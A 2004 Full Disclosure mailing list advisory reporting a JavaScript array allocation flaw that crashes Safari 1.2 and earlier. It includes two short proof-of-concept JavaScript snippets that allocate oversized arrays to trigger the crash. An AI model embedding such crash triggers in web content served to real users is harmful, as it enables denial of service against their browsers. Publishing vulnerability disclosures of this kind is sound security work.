Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Safari javascript array overflow

From: kang <kang () insecure ws>
Date: Sat, 06 Mar 2004 22:40:54 +0100
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

http://www.insecure.ws/article.php?story=2004021918172533

A problem exists in the way Safari Javascript engine allocates Arrays.
For example, allocating a too big array and writing into it, will
segfault Safari. There is no known way to execute remote code with this
vulnerability as the date of this advisory.
Konqueror doesn't seems to be vulnerable.


- --

Adv: safari_0x03
Release Date: 06/04/04
Affected Products: Safari =< 1.2
Impact: Denial of Service, Possibly exploitation
Severity: Remote, medium.
Vendor: Notified (19/03/04)
Author: kang, kang () insecure ws


Simple allocation management error trigger:

~    var a = new Array(99999999999999999999999);
~    a[0+5]="AAAAA";


Another possibilty...;)

var bam = new Array(0x23000000);
bam.sort(new Function("return 1"));


There are some other possibilities :>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFASkVmxt5Ja4aWvZMRAtG7AKCOz+licSBi/NpYe4qNu4YX468mCACdF4LA
DOrzcVourknKaBqvWFAlaQI=
=VISk
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: